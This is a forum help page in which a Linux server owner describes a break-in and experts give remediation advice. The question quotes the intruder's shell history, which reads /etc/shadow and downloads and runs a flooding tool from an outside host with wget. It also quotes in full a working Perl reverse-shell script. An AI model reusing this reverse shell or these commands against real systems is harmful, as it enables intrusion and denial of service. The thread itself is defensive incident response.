Question

Linux: Possible root vulnerability, through url code injection

Asked by: TSHAW

Hello, I've searched my question and I found something similar in the ID: 21727726. But I have an extra problem. The hacker didn't just copy the "back" file to the /tmp directory but also, I found in the /root/.bash_history the following set of commands that I didn't introduce in any terminal of my server:

ifconfig
ifconfig -all
ifconfig ?
ifconfig --help
man ifconfig
id
cd /etc
ls -la
cd yum
ls -la
cat /etc/shadow
wget http://ddmalfa.cz/_adm/dd
chmod 777 dd
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd www.zone-h.org 53 127.0.0.66
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128
./dd zone-h.org 80 127.0.0.128

Apparently the hacker accessed my server as root (since it is the only way he could possibly ran the commands in a superuser terminal) and ran that set of commands, including the download of the dd script; I'm sure he didn't accessed by putting the correct password, because he didn't changed it and I've already search in the logs for ssh failures. I'm attaching the screenshot of the dd script code. If you need it I can send it to you.

We first noticed the attack because our site just became unreachable and even through the FW we didn't reach the servers. When I first accesed the server (fisically) I just saw the "dd" process running with the 100% of the CPU, so I proceeded to kill it. After that the server got normal and so the FW.

So my question:  
1.- Is he really accessed my server as root?
2.- If it is so,  what do I have to do to protect it?


Thank you in advance

"back" code:
 
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

                                  
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
18:
19:
20:
21:

Select allOpen in new window

  • DDOS.doc
    • 125 KB

    Screen Shot of the DDOS script.

This Question has been solved and asker verified All Experts Exchange premium technology solutions are available to subscription members.

Subscribe now for full access to Experts Exchange and get

Instant Access to this Solution

  • Plus...
  • 30 Day FREE access, no risk, no obligation
  • Collaborate with the world's top tech experts
  • Unlimited access to our exclusive solution database
  • Never be left without tech help again

Subscribe Now

Asked On
2009-10-21 at 17:49:49ID24832911
Tags

root

,

vulnerability

,

code injection

,

perl

Topics

Linux Network Security

,

Web Servers

,

Networking Security Vulnerabilities

Participating Experts
3
Points
350
Comments
9

Trusted by hundreds of thousands everyday for fast, accurate and reliable tech support.

  • "The time we save is the biggest benefit of Experts Exchange to Warner Bros. What could take multiple guys 2 hours or more each to find is accessed in around 15 minutes on Experts Exchange." Mike Kapnisakis, Warner Bros.
  • "Our team likes having a resource that is more secure than just using Google and most experts using this service really know their stuff. It's nice to look here first versus using Google." Dayna Sellner, Lockheed Martin
  • "Anytime that I've been stumped with a problem, 9 out of 10 times Experts Exchange has either the accepted solution or an open discussion of the potential solution to the problem." Kenny Red, eBay Inc.

See what Experts Exchange can do for you.

Got a question?

We've got the answer.

Experts Exchange has been collecting answers to technology questions since 1996…3 million and counting! If you have a question, chances are we already have your answer.

Screenshot of Experts Exchange Knowledgebase

Need individual assistance?

Our experts are ready to help.

If you can't find the exact answer you're looking for, ask our exclusive community of 50,000 experts. You’ll get a personalized answer from a trusted professional.

Screenshot of Experts Exchange Knowledgebase

Want to learn from the best?

Read articles from industry experts.

Thousands of free tech tips, tricks, how-to’s and tutorials are available in our peer reviewed articles section. See for yourself how smart our experts are, no login required.

Screenshot of an Article

Working on a long term project?

Store your work and research.

Save solutions to your questions, answers you’ve discovered through searching plus helpful articles in your personal knowledgebase for easy future access.

Screenshot of Experts Exchange Knowledgebase

Access the answers to your technology questions today.

Subscribe Now

30-day free trial. Register in 60 seconds.

What Makes Experts Exchange Unique?

Members of the expert community talk about why the experience at Experts Exchange is different than what you will find anywhere else.

Trusted by the world's most respected brands.

image of each brand's logo

Faithfully serving IT professionals since 1996.

Experts Exchange Logo

Try it out and discover for yourself.

Subscribe Now

30-day free trial. Register in 60 seconds.

Related Solutions

  1. PHP - How to find out if files exists using ls and ssh
    I want to read the contents of three directories using ssh and ls. I have in mind using system('ssh user@server.com ls'); I then have a list of files that need to be checked if they exists. So I need to figure out how to use ls and parse it into an array where each file is...
  2. Possible Injection <xss>alert('XSS')</vulnerable>
    I am getting a few errors on the same asp page. Here are the error messages: Possible injection https://mywebsite.com/ProdList.asp?c Category=%3Cxss%3Ealert%28%27XSS%27%29%3C%2 Fvulnerable%3E&idCategory=101&idstore=6 ("<xss>alert('XSS')</vulnerable>&...
  3. sql injection
    What is an SQL Injection Attack / Vulnerability? In my official web site security audit, the following query found SQL Injection Attack / Vulnerability.. How to avoid this. please help urgent. mysql_query("UPDATE users SET age='$age' WHERE id = '$id'"); thaks in ad...
  4. SQL injection question3
    is code below vulnerable to sql injection
  5. SQl injection
    How can I control if my web site is vulnerable to SQL injection? what was the sentence of sql injection?
  6. SQL Injection Vulnerability & Prevention
    Is there a good utility for finding where my site(s) might be vulnerable to sql injection? I am currently getting hit and I can't figure out how. Also, is there a good script to use to validate input before it gets to the database? Thanks

Free Tech Articles

  1. WARNING: 5 Reasons why you should NEVER fix a computer for free.
    It is in our nature to love the puzzle. We are obsessed. The lot of us. We love puzzles. We love the challenge. We thrive on finding the answer. We hate disarray. It bothers us deep in our soul. W...
  2. SCCM OSD Basic troubleshooting
    SCCM 2007 OSD is a fantastic way to deploy operating systems, however, like most things SCCM issues can sometimes be difficult to resolve due to the sheer volume of logs to sift through and the dispe...
  3. Migrate Small Business Server 2003 to Exchange 2010 and Windows 2008 R2
    This guide is intended to provide step by step instructions on how to migrate from Small Business Server 2003 to Windows 2008 R2 with Exchange 2010. For this migration to work you will need the fo...
  4. Create a Win7 Gadget
    This article shows you how to create a simple "Gadget" -- a sort of mini-application supported by Windows 7 and Vista. Gadgets can be dropped anywhere on the desktop to provide instant information, ...
  5. Outlook continually prompting for username and password
    There have been a lot of questions recently regarding Outlook prompting for a username and password whilst using Exchange 2007. There are a few reasons why this would happen and I will try to cover t...
  6. Backup Exchange 2010 Information Store using Windows Backup
    There seems to be quite a lot of confusion around the ability to backup Exchange 2010 using the built in Windows Backup feature. This stems from the omission of this feature prior to Exchange 2007 s...

Cloud Class Webinars

  1. Avoiding Bugs in Microsoft Access
    Alison Balter takes and in-depth look at avoiding bugs in Access. In this webinar you will learn about using the immediate window to debug your applications, invoking the debugger, using breakpoints to troubleshoot, stepping through code, setting the next statement to execute, ...
  2. Top 10 Best New Features in Visio 2010
    Scott Helmers gives live demonstrations of the top 10 new features in Visio 2010. This webinar will teach you how to create compelling diagrams by adding shapes to the page with a single click, linking the shapes in a diagram to data in Excel (or SQL Server, or SharePoint), ...
  3. IT Consultant Business Secrets Revealed
    Michael Munger, Experts Exchange tech pro and IT consultant, pulls back the curtain on his very successful businesses and answers question on every IT consultant and business owner should know about. He shares secrets on what he did to solve the 5 most common problems in IT, ...
  4. Disaster Recovery and Business Continuity
    Quest CTO, Mike Billon, gives an overview of the steps involved in building a dunamic disaster recovery plan. Through case studies and an examination of software/hardware tooles for monitoring and testing, you'll gain a better understandin of where you are, where you want ...
  5. Organize Your Visio Diagrams with Containers and Lists
    Scott Helmers uses cross functional flowcharts, wireframe diagrams, data graphic legends and seating charts to teach you: how to ustilize all three new structured diagram components in Visio 2010, the best practices for organizeing shapes in previous version of Visio, how to organize ...
  6. How to Us Objects, Properties, Events and Methods in Microsoft Access
    Alison Dalter gives an in-depbth look at objects, properties, events and methods in Microsoft Access. In this webinar you will learn about using the object browser, referring to objects, working with properties and methods, working with object variables, understanding the ...

Join the Community

Give a Little. Get a Lot.

Join the community of experts here and help other tech pros by answering question in your area of expertise. You can earn FREE access to all Experts Exchange's premium features and resources.

Join the Community

Answers

 

by: ahoffmannPosted on 2009-10-22 at 06:12:13ID: 25633706

do you probably have vulnerable web applications on that server?

 

by: fosiul01Posted on 2009-10-22 at 07:25:30ID: 25634564

Whats this SErver for ?? webserver ??

First off all, i will tell you to Remove this server from production, Break it and the install new OS again.

Cause : when some one entered to the server ( by any how) they might open some back door, so even though if you delete those file, still it will be infected again.


"I'm sure he didn't accessed by putting the correct password, because he didn't changed it and I've already search in the logs for ssh failures"

thats true. they dont have to change the password!! they can put some hidden script and it will make an open door for him to come any time!! and if a server is hacked, /var/log/secure log is useless,because thats the place they will hack first, and they will delete any entry related to their hacking...

if you use syslog server to remotely copy all the log to another server then you could of notice if it has been accessed by some one or  not. other then that its just useless.


1. Reinstall your server.
2. Put all the data from BAckup but make sure those backup is not tampered by one 1
3. Use strong firewall to protect your server
4. Use iptables and only allow certain traifq to your server
5. use portsentry ( a free but really good software) to secure your server from IDS
6. use fail2 ban
7. If this server is webserver, dont allow direct trafiq to this server, use a reverse proxy and then from reverse proxy allow http connection to thsi server
8. use mod security to protect your apache
9 Make sure apache is not running as root user..


this are the basic. thing you can do if you dont want to pay for paid security software...





 

by: ahoffmannPosted on 2009-10-22 at 07:31:46ID: 25634655

> 1. Reinstall your server.
FULL ACK
:)

<probably off-topic>

> 8. use mod security to protect your apache
hmm, mod_security can protect you application, but it can protect apapche only partially
remember that mod_security is a module inside apache
</probably off-topic>

 

by: TSHAWPosted on 2009-10-22 at 09:19:48ID: 25635940

1.- This server is a Webserver (web application)
2.- This server is behind a Juniper Netscreen FireWall, all the ports are protected the only one that is open is the 80 and it's redirected to the server through a VIP service
3.- The servers are not direct reachable from ssh, ftp or telnet from the internet. I have a VPN from my office to administrate them, with local ip addresses.
4.- Apache is not running as root.

I think that it is difficult to access direct to the server considering the above. So maybe the hacker really accessed my server through some vulnerability of the web appl, iisn't it?

 

by: ahoffmannPosted on 2009-10-23 at 00:07:32ID: 25641885

if your server (httpd process)  is not running as root, and the default server (that part which is serverd as user root) is not accessable, then there're only 2 possibilities left:
  1. the web server (apache httpd here) itself has a vulnerability
  2. any of the applications uses/calls an external program which can get root access

Do you have any hints in your access_log or error_log?

 

by: fosiul01Posted on 2009-10-23 at 00:40:53ID: 25642017

The scenerio you saying, then its looks like its done via web server...

what kind of website is your server holding ?? does any website require to play with Linux file system or some thing like that ??
what i meant is, does any website has any ability to modify Linux file system for any kind of purpose.. or anything ..


is your apache is up2date ?? is your Linux server up2date ??

 

by: TSHAWPosted on 2009-10-23 at 08:39:16ID: 25645470

ahoffmann:

1.- The apache child processes are running as nobody but indeed the default server is running as root. So what do I have to do to be sure this default server (root running) is not accesable .
2.- I've already looked at the access_log and error_log and I didn't see anything wrong.

fosiul01:

1.- My web site is an AVL (automatic vehicle location) developed in php. As far as I can remember there is'nt any part of the website that access Linux file system. I indeed have some php scripts that run over cli but those scripts are not accesable from web (these php scripts do play with Linux file system).
2.- We are now updating apache and linux right now (to tell you the truth we didn't update them for a while).

note: We just decided to run apache in a higher port  ( 1030 ) so the FW do the translation from the 80 to the 1030 and to use a user called "webserver" to run apache. What do you think?

 

by: fosiul01Posted on 2009-10-23 at 09:03:27ID: 25645731

update both Apache and linux ( but REinstall first) dont update the same server. Reinstall totaly then install again.

Put firewall .. install modsecuiry, Now a days , most company using mod security for apache level firewall

also use Reverse proxy concept , it will save 90% to hack your main server ....

also, Since you have been hacked onecE!! keep all your log to a different server. which cant be accessible from outside . if any incident happended you will know how this happended.

as i said, hacker first thing they do is , delete all the offensive log from compromised server

 

by: legolasthehansyPosted on 2009-10-27 at 00:22:04ID: 25669764

I feel sorry for TSHAW and this certainly seems to be a hard lesson..
Adding to the experts here,
If you are hacked once, you are going to be hacked again. So you have to be prepared. Before sending the server to production, do a vulnerability scan on the server (you can use Web Inspect or Nikto, there are lots out there)
Once done along with the experts suggestions - deploy. A syslog server also would help so that you webserver can direct its logs to it.

20120131-EE-VQP-002

3 Ways to Join

30-Day Free Trial

The Experts

98% positive feedback on 31,087 answers since March 2000. angeliii is a Microsoft Most Valuable Professional for his work with MS SQL Server & Develoment.

He has also proven his knowledge of Visual Basic Programming, PHP Scripting and Oracle Databases.

The Experts

97% positive feedback on 10,752 answers since July 2000. lrmoore has more than 18 years experience in the networking industry.

The six-time Mircosoft MVPs specialties include firewalls, virtual private networking, and network management.

Testimonials

"...and excellent source for support... Kind of like having your very own IT dept." Electriciansnet

Testimonials

"I was apprehensive at signing up at first. However... it has already made my life as an IT administrator much easier." JaCrews

Testimonials

"WOW! You guys have great, active, and knowledgeable people on here." moore50

Business Clients

Business Clients

In the Press

"If you’ve got a question... Experts Exchange can supply an answer.”

In the Press

"...an invaluable aid for both IT professionals and those who require tech support."

In the Press

"where IT professionals provide quick answers on just about any topic"

Business Account Plans

Loading Advertisement...